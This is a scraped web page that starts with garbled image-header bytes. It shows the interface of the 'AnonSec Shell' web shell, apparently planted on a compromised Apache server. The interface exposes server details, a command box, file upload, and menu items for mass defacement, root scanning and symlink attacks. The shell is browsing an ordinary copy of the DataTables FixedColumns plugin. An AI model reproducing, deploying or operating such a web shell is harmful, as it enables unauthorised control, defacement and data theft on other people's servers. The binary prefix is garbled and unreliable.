JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/merenda/apuiares/datatables/extensions/FixedColumns/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/merenda/apuiares/datatables/extensions/FixedColumns/js/dataTables.fixedColumns.min.js
/*!
 FixedColumns 3.0.4
 ©2010-2014 SpryMedia Ltd - datatables.net/license
 */
(function (r, s, t) {
    var p = function (d) {
        var j = function (a, b) {
            var c = this;
            if (this instanceof j) {
                "undefined" == typeof b && (b = {});
                var g = d.fn.dataTable.camelToHungarian;
                g && (g(j.defaults, j.defaults, !0), g(j.defaults, b));
                g = d.fn.dataTable.Api ? (new d.fn.dataTable.Api(a)).settings()[0] : a.fnSettings();
                this.s = {dt: g, iTableColumns: g.aoColumns.length, aiOuterWidths: [], aiInnerWidths: []};
                this.dom = {
                    scroller: null, header: null, body: null, footer: null, grid: {
                        wrapper: null, dt: null, left: {wrapper: null, head: null, body: null, foot: null}, right: {
                            wrapper: null,
                            head: null, body: null, foot: null
                        }
                    }, clone: {left: {header: null, body: null, footer: null}, right: {header: null, body: null, footer: null}}
                };
                g._oFixedColumns = this;
                g._bInitComplete ? this._fnConstruct(b) : g.oApi._fnCallbackReg(g, "aoInitComplete", function () {
                    c._fnConstruct(b)
                }, "FixedColumns")
            } else alert("FixedColumns warning: FixedColumns must be initialised with the 'new' keyword.")
        };
        j.prototype = {
            fnUpdate: function () {
                this._fnDraw(!0)
            }, fnRedrawLayout: function () {
                this._fnColCalc();
                this._fnGridLayout();
                this.fnUpdate()
            }, fnRecalculateHeight: function (a) {
                delete a._DTTC_iHeight;
                a.style.height = "auto"
            }, fnSetRowHeight: function (a, b) {
                a.style.height = b + "px"
            }, fnGetPosition: function (a) {
                var b = this.s.dt.oInstance;
                if (d(a).parents(".DTFC_Cloned").length) {
                    if ("tr" === a.nodeName.toLowerCase())return a = d(a).index(), b.fnGetPosition(d("tr", this.s.dt.nTBody)[a]);
                    var c = d(a).index(), a = d(a.parentNode).index();
                    return [b.fnGetPosition(d("tr", this.s.dt.nTBody)[a]), c, b.oApi._fnVisibleToColumnIndex(this.s.dt, c)]
                }
                return b.fnGetPosition(a)
            }, _fnConstruct: function (a) {
                var b = this;
                if ("function" != typeof this.s.dt.oInstance.fnVersionCheck ||
                    !0 !== this.s.dt.oInstance.fnVersionCheck("1.8.0"))alert("FixedColumns " + j.VERSION + " required DataTables 1.8.0 or later. Please upgrade your DataTables installation"); else if ("" === this.s.dt.oScroll.sX)this.s.dt.oInstance.oApi._fnLog(this.s.dt, 1, "FixedColumns is not needed (no x-scrolling in DataTables enabled), so no action will be taken. Use 'FixedHeader' for column fixing when scrolling is not enabled"); else {
                    this.s = d.extend(!0, this.s, j.defaults, a);
                    a = this.s.dt.oClasses;
                    this.dom.grid.dt = d(this.s.dt.nTable).parents("div." +
                        a.sScrollWrapper)[0];
                    this.dom.scroller = d("div." + a.sScrollBody, this.dom.grid.dt)[0];
                    this._fnColCalc();
                    this._fnGridSetup();
                    var c;
                    d(this.dom.scroller).on("mouseover.DTFC touchstart.DTFC", function () {
                        c = "main"
                    }).on("scroll.DTFC", function () {
                        if ("main" === c && (0 < b.s.iLeftColumns && (b.dom.grid.left.liner.scrollTop = b.dom.scroller.scrollTop), 0 < b.s.iRightColumns))b.dom.grid.right.liner.scrollTop = b.dom.scroller.scrollTop
                    });
                    var g = "onwheel" in s.createElement("div") ? "wheel.DTFC" : "mousewheel.DTFC";
                    if (0 < b.s.iLeftColumns)d(b.dom.grid.left.liner).on("mouseover.DTFC touchstart.DTFC",
                        function () {
                            c = "left"
                        }).on("scroll.DTFC", function () {
                        "left" === c && (b.dom.scroller.scrollTop = b.dom.grid.left.liner.scrollTop, 0 < b.s.iRightColumns && (b.dom.grid.right.liner.scrollTop = b.dom.grid.left.liner.scrollTop))
                    }).on(g, function (a) {
                        b.dom.scroller.scrollLeft -= "wheel" === a.type ? -a.originalEvent.deltaX : a.originalEvent.wheelDeltaX
                    });
                    if (0 < b.s.iRightColumns)d(b.dom.grid.right.liner).on("mouseover.DTFC touchstart.DTFC", function () {
                        c = "right"
                    }).on("scroll.DTFC", function () {
                        "right" === c && (b.dom.scroller.scrollTop =
                            b.dom.grid.right.liner.scrollTop, 0 < b.s.iLeftColumns && (b.dom.grid.left.liner.scrollTop = b.dom.grid.right.liner.scrollTop))
                    }).on(g, function (a) {
                        b.dom.scroller.scrollLeft -= "wheel" === a.type ? -a.originalEvent.deltaX : a.originalEvent.wheelDeltaX
                    });
                    d(r).on("resize.DTFC", function () {
                        b._fnGridLayout.call(b)
                    });
                    var f = !0, e = d(this.s.dt.nTable);
                    e.on("draw.dt.DTFC", function () {
                        b._fnDraw.call(b, f);
                        f = !1
                    }).on("column-sizing.dt.DTFC", function () {
                        b._fnColCalc();
                        b._fnGridLayout(b)
                    }).on("column-visibility.dt.DTFC", function () {
                        b._fnColCalc();
                        b._fnGridLayout(b);
                        b._fnDraw(!0)
                    }).on("destroy.dt.DTFC", function () {
                        e.off("column-sizing.dt.DTFC destroy.dt.DTFC draw.dt.DTFC");
                        d(b.dom.scroller).off("scroll.DTFC mouseover.DTFC");
                        d(r).off("resize.DTFC");
                        d(b.dom.grid.left.liner).off("scroll.DTFC mouseover.DTFC " + g);
                        d(b.dom.grid.left.wrapper).remove();
                        d(b.dom.grid.right.liner).off("scroll.DTFC mouseover.DTFC " + g);
                        d(b.dom.grid.right.wrapper).remove()
                    });
                    this._fnGridLayout();
                    this.s.dt.oInstance.fnDraw(!1)
                }
            }, _fnColCalc: function () {
                var a = this, b = 0, c = 0;
                this.s.aiInnerWidths =
                    [];
                this.s.aiOuterWidths = [];
                d.each(this.s.dt.aoColumns, function (g, f) {
                    var e = d(f.nTh), h;
                    if (e.filter(":visible").length) {
                        var i = e.outerWidth();
                        0 === a.s.aiOuterWidths.length && (h = d(a.s.dt.nTable).css("border-left-width"), i += "string" === typeof h ? 1 : parseInt(h, 10));
                        a.s.aiOuterWidths.length === a.s.dt.aoColumns.length - 1 && (h = d(a.s.dt.nTable).css("border-right-width"), i += "string" === typeof h ? 1 : parseInt(h, 10));
                        a.s.aiOuterWidths.push(i);
                        a.s.aiInnerWidths.push(e.width());
                        g < a.s.iLeftColumns && (b += i);
                        a.s.iTableColumns - a.s.iRightColumns <=
                        g && (c += i)
                    } else a.s.aiInnerWidths.push(0), a.s.aiOuterWidths.push(0)
                });
                this.s.iLeftWidth = b;
                this.s.iRightWidth = c
            }, _fnGridSetup: function () {
                var a = this._fnDTOverflow(), b;
                this.dom.body = this.s.dt.nTable;
                this.dom.header = this.s.dt.nTHead.parentNode;
                this.dom.header.parentNode.parentNode.style.position = "relative";
                var c = d('<div class="DTFC_ScrollWrapper" style="position:relative; clear:both;"><div class="DTFC_LeftWrapper" style="position:absolute; top:0; left:0;"><div class="DTFC_LeftHeadWrapper" style="position:relative; top:0; left:0; overflow:hidden;"></div><div class="DTFC_LeftBodyWrapper" style="position:relative; top:0; left:0; overflow:hidden;"><div class="DTFC_LeftBodyLiner" style="position:relative; top:0; left:0; overflow-y:scroll;"></div></div><div class="DTFC_LeftFootWrapper" style="position:relative; top:0; left:0; overflow:hidden;"></div></div><div class="DTFC_RightWrapper" style="position:absolute; top:0; left:0;"><div class="DTFC_RightHeadWrapper" style="position:relative; top:0; left:0;"><div class="DTFC_RightHeadBlocker DTFC_Blocker" style="position:absolute; top:0; bottom:0;"></div></div><div class="DTFC_RightBodyWrapper" style="position:relative; top:0; left:0; overflow:hidden;"><div class="DTFC_RightBodyLiner" style="position:relative; top:0; left:0; overflow-y:scroll;"></div></div><div class="DTFC_RightFootWrapper" style="position:relative; top:0; left:0;"><div class="DTFC_RightFootBlocker DTFC_Blocker" style="position:absolute; top:0; bottom:0;"></div></div></div></div>')[0],
                    g = c.childNodes[0], f = c.childNodes[1];
                this.dom.grid.dt.parentNode.insertBefore(c, this.dom.grid.dt);
                c.appendChild(this.dom.grid.dt);
                this.dom.grid.wrapper = c;
                0 < this.s.iLeftColumns && (this.dom.grid.left.wrapper = g, this.dom.grid.left.head = g.childNodes[0], this.dom.grid.left.body = g.childNodes[1], this.dom.grid.left.liner = d("div.DTFC_LeftBodyLiner", c)[0], c.appendChild(g));
                0 < this.s.iRightColumns && (this.dom.grid.right.wrapper = f, this.dom.grid.right.head = f.childNodes[0], this.dom.grid.right.body = f.childNodes[1], this.dom.grid.right.liner =
                    d("div.DTFC_RightBodyLiner", c)[0], b = d("div.DTFC_RightHeadBlocker", c)[0], b.style.width = a.bar + "px", b.style.right = -a.bar + "px", this.dom.grid.right.headBlock = b, b = d("div.DTFC_RightFootBlocker", c)[0], b.style.width = a.bar + "px", b.style.right = -a.bar + "px", this.dom.grid.right.footBlock = b, c.appendChild(f));
                if (this.s.dt.nTFoot && (this.dom.footer = this.s.dt.nTFoot.parentNode, 0 < this.s.iLeftColumns && (this.dom.grid.left.foot = g.childNodes[2]), 0 < this.s.iRightColumns))this.dom.grid.right.foot = f.childNodes[2]
            }, _fnGridLayout: function () {
                var a =
                    this.dom.grid, b = d(a.wrapper).width(), c = d(this.s.dt.nTable.parentNode).outerHeight(), g = d(this.s.dt.nTable.parentNode.parentNode).outerHeight(), f = this._fnDTOverflow(), e = this.s.iLeftWidth, h = this.s.iRightWidth, i = function (a, b) {
                    f.bar ? a.style.width = b + f.bar + "px" : (a.style.width = b + 20 + "px", a.style.paddingRight = "20px", a.style.boxSizing = "border-box")
                };
                f.x && (c -= f.bar);
                a.wrapper.style.height = g + "px";
                0 < this.s.iLeftColumns && (a.left.wrapper.style.width = e + "px", a.left.wrapper.style.height = "1px", a.left.body.style.height =
                    c + "px", a.left.foot && (a.left.foot.style.top = (f.x ? f.bar : 0) + "px"), i(a.left.liner, e), a.left.liner.style.height = c + "px");
                0 < this.s.iRightColumns && (b -= h, f.y && (b -= f.bar), a.right.wrapper.style.width = h + "px", a.right.wrapper.style.left = b + "px", a.right.wrapper.style.height = "1px", a.right.body.style.height = c + "px", a.right.foot && (a.right.foot.style.top = (f.x ? f.bar : 0) + "px"), i(a.right.liner, h), a.right.liner.style.height = c + "px", a.right.headBlock.style.display = f.y ? "block" : "none", a.right.footBlock.style.display = f.y ? "block" :
                    "none")
            }, _fnDTOverflow: function () {
                var a = this.s.dt.nTable, b = a.parentNode, c = {x: !1, y: !1, bar: this.s.dt.oScroll.iBarWidth};
                a.offsetWidth > b.clientWidth && (c.x = !0);
                a.offsetHeight > b.clientHeight && (c.y = !0);
                return c
            }, _fnDraw: function (a) {
                this._fnGridLayout();
                this._fnCloneLeft(a);
                this._fnCloneRight(a);
                null !== this.s.fnDrawCallback && this.s.fnDrawCallback.call(this, this.dom.clone.left, this.dom.clone.right);
                d(this).trigger("draw.dtfc", {leftClone: this.dom.clone.left, rightClone: this.dom.clone.right})
            }, _fnCloneRight: function (a) {
                if (!(0 >=
                    this.s.iRightColumns)) {
                    var b, c = [];
                    for (b = this.s.iTableColumns - this.s.iRightColumns; b < this.s.iTableColumns; b++)this.s.dt.aoColumns[b].bVisible && c.push(b);
                    this._fnClone(this.dom.clone.right, this.dom.grid.right, c, a)
                }
            }, _fnCloneLeft: function (a) {
                if (!(0 >= this.s.iLeftColumns)) {
                    var b, c = [];
                    for (b = 0; b < this.s.iLeftColumns; b++)this.s.dt.aoColumns[b].bVisible && c.push(b);
                    this._fnClone(this.dom.clone.left, this.dom.grid.left, c, a)
                }
            }, _fnCopyLayout: function (a, b) {
                for (var c = [], g = [], f = [], e = 0, h = a.length; e < h; e++) {
                    var i = [];
                    i.nTr = d(a[e].nTr).clone(!0, !0)[0];
                    for (var k = 0, j = this.s.iTableColumns; k < j; k++)if (-1 !== d.inArray(k, b)) {
                        var m = d.inArray(a[e][k].cell, f);
                        -1 === m ? (m = d(a[e][k].cell).clone(!0, !0)[0], g.push(m), f.push(a[e][k].cell), i.push({cell: m, unique: a[e][k].unique})) : i.push({
                            cell: g[m],
                            unique: a[e][k].unique
                        })
                    }
                    c.push(i)
                }
                return c
            }, _fnClone: function (a, b, c, g) {
                var f = this, e, h, i, k, j, m, o, n, q, l = this.s.dt;
                if (g) {
                    null !== a.header && a.header.parentNode.removeChild(a.header);
                    a.header = d(this.dom.header).clone(!0, !0)[0];
                    a.header.className +=
                        " DTFC_Cloned";
                    a.header.style.width = "100%";
                    b.head.appendChild(a.header);
                    n = this._fnCopyLayout(l.aoHeader, c);
                    k = d(">thead", a.header);
                    k.empty();
                    e = 0;
                    for (h = n.length; e < h; e++)k[0].appendChild(n[e].nTr);
                    l.oApi._fnDrawHead(l, n, !0)
                } else {
                    n = this._fnCopyLayout(l.aoHeader, c);
                    q = [];
                    l.oApi._fnDetectHeader(q, d(">thead", a.header)[0]);
                    e = 0;
                    for (h = n.length; e < h; e++) {
                        i = 0;
                        for (k = n[e].length; i < k; i++)q[e][i].cell.className = n[e][i].cell.className, d("span.DataTables_sort_icon", q[e][i].cell).each(function () {
                            this.className = d("span.DataTables_sort_icon",
                                n[e][i].cell)[0].className
                        })
                    }
                }
                this._fnEqualiseHeights("thead", this.dom.header, a.header);
                "auto" == this.s.sHeightMatch && d(">tbody>tr", f.dom.body).css("height", "auto");
                null !== a.body && (a.body.parentNode.removeChild(a.body), a.body = null);
                a.body = d(this.dom.body).clone(!0)[0];
                a.body.className += " DTFC_Cloned";
                a.body.style.paddingBottom = l.oScroll.iBarWidth + "px";
                a.body.style.marginBottom = 2 * l.oScroll.iBarWidth + "px";
                null !== a.body.getAttribute("id") && a.body.removeAttribute("id");
                d(">thead>tr", a.body).empty();
                d(">tfoot",
                    a.body).remove();
                var p = d("tbody", a.body)[0];
                d(p).empty();
                if (0 < l.aiDisplay.length) {
                    h = d(">thead>tr", a.body)[0];
                    for (o = 0; o < c.length; o++)j = c[o], m = d(l.aoColumns[j].nTh).clone(!0)[0], m.innerHTML = "", k = m.style, k.paddingTop = "0", k.paddingBottom = "0", k.borderTopWidth = "0", k.borderBottomWidth = "0", k.height = 0, k.width = f.s.aiInnerWidths[j] + "px", h.appendChild(m);
                    d(">tbody>tr", f.dom.body).each(function (a) {
                        var b = this.cloneNode(false);
                        b.removeAttribute("id");
                        a = f.s.dt.aoData[f.s.dt.oFeatures.bServerSide === false ? f.s.dt.aiDisplay[f.s.dt._iDisplayStart +
                            a] : a].anCells || d(this).children("td, th");
                        for (o = 0; o < c.length; o++) {
                            j = c[o];
                            if (a.length > 0) {
                                m = d(a[j]).clone(true, true)[0];
                                b.appendChild(m)
                            }
                        }
                        p.appendChild(b)
                    })
                } else d(">tbody>tr", f.dom.body).each(function () {
                    m = this.cloneNode(true);
                    m.className = m.className + " DTFC_NoData";
                    d("td", m).html("");
                    p.appendChild(m)
                });
                a.body.style.width = "100%";
                a.body.style.margin = "0";
                a.body.style.padding = "0";
                l.oScroller !== t && (h = l.oScroller.dom.force, b.forcer ? b.forcer.style.height = h.style.height : (b.forcer = h.cloneNode(!0), b.liner.appendChild(b.forcer)));
                b.liner.appendChild(a.body);
                this._fnEqualiseHeights("tbody", f.dom.body, a.body);
                if (null !== l.nTFoot) {
                    if (g) {
                        null !== a.footer && a.footer.parentNode.removeChild(a.footer);
                        a.footer = d(this.dom.footer).clone(!0, !0)[0];
                        a.footer.className += " DTFC_Cloned";
                        a.footer.style.width = "100%";
                        b.foot.appendChild(a.footer);
                        n = this._fnCopyLayout(l.aoFooter, c);
                        b = d(">tfoot", a.footer);
                        b.empty();
                        e = 0;
                        for (h = n.length; e < h; e++)b[0].appendChild(n[e].nTr);
                        l.oApi._fnDrawHead(l, n, !0)
                    } else {
                        n = this._fnCopyLayout(l.aoFooter, c);
                        b = [];
                        l.oApi._fnDetectHeader(b,
                            d(">tfoot", a.footer)[0]);
                        e = 0;
                        for (h = n.length; e < h; e++) {
                            i = 0;
                            for (k = n[e].length; i < k; i++)b[e][i].cell.className = n[e][i].cell.className
                        }
                    }
                    this._fnEqualiseHeights("tfoot", this.dom.footer, a.footer)
                }
                b = l.oApi._fnGetUniqueThs(l, d(">thead", a.header)[0]);
                d(b).each(function (a) {
                    j = c[a];
                    this.style.width = f.s.aiInnerWidths[j] + "px"
                });
                null !== f.s.dt.nTFoot && (b = l.oApi._fnGetUniqueThs(l, d(">tfoot", a.footer)[0]), d(b).each(function (a) {
                    j = c[a];
                    this.style.width = f.s.aiInnerWidths[j] + "px"
                }))
            }, _fnGetTrNodes: function (a) {
                for (var b =
                    [], c = 0, d = a.childNodes.length; c < d; c++)"TR" == a.childNodes[c].nodeName.toUpperCase() && b.push(a.childNodes[c]);
                return b
            }, _fnEqualiseHeights: function (a, b, c) {
                if (!("none" == this.s.sHeightMatch && "thead" !== a && "tfoot" !== a)) {
                    var g, f, e = b.getElementsByTagName(a)[0], c = c.getElementsByTagName(a)[0], a = d(">" + a + ">tr:eq(0)", b).children(":first");
                    a.outerHeight();
                    a.height();
                    for (var e = this._fnGetTrNodes(e), b = this._fnGetTrNodes(c), h = [], c = 0, a = b.length; c < a; c++)g = e[c].offsetHeight, f = b[c].offsetHeight, g = f > g ? f : g, "semiauto" == this.s.sHeightMatch &&
                    (e[c]._DTTC_iHeight = g), h.push(g);
                    c = 0;
                    for (a = b.length; c < a; c++)b[c].style.height = h[c] + "px", e[c].style.height = h[c] + "px"
                }
            }
        };
        j.defaults = {iLeftColumns: 1, iRightColumns: 0, fnDrawCallback: null, sHeightMatch: "semiauto"};
        j.version = "3.0.4";
        d.fn.dataTable.FixedColumns = j;
        return d.fn.DataTable.FixedColumns = j
    };
    "function" === typeof define && define.amd ? define(["jquery", "datatables"], p) : "object" === typeof exports ? p(require("jquery"), require("datatables")) : jQuery && !jQuery.fn.dataTable.FixedColumns && p(jQuery, jQuery.fn.dataTable)
})(window,
    document);

Anon7 - 2022
AnonSec Team